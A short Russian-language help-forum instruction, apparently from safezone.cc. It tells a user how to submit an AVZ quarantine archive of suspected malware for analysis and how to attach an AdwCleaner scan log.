Файл quarantine.7z из папки с распакованной утилитой AVZ отправьте с помощью формы отправки карантина или на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: malware в теле письма.
К сообщению прикреплять файл quarantine.zip не нужно!

- Подготовьте и прикрепите лог сканирования AdwCleaner.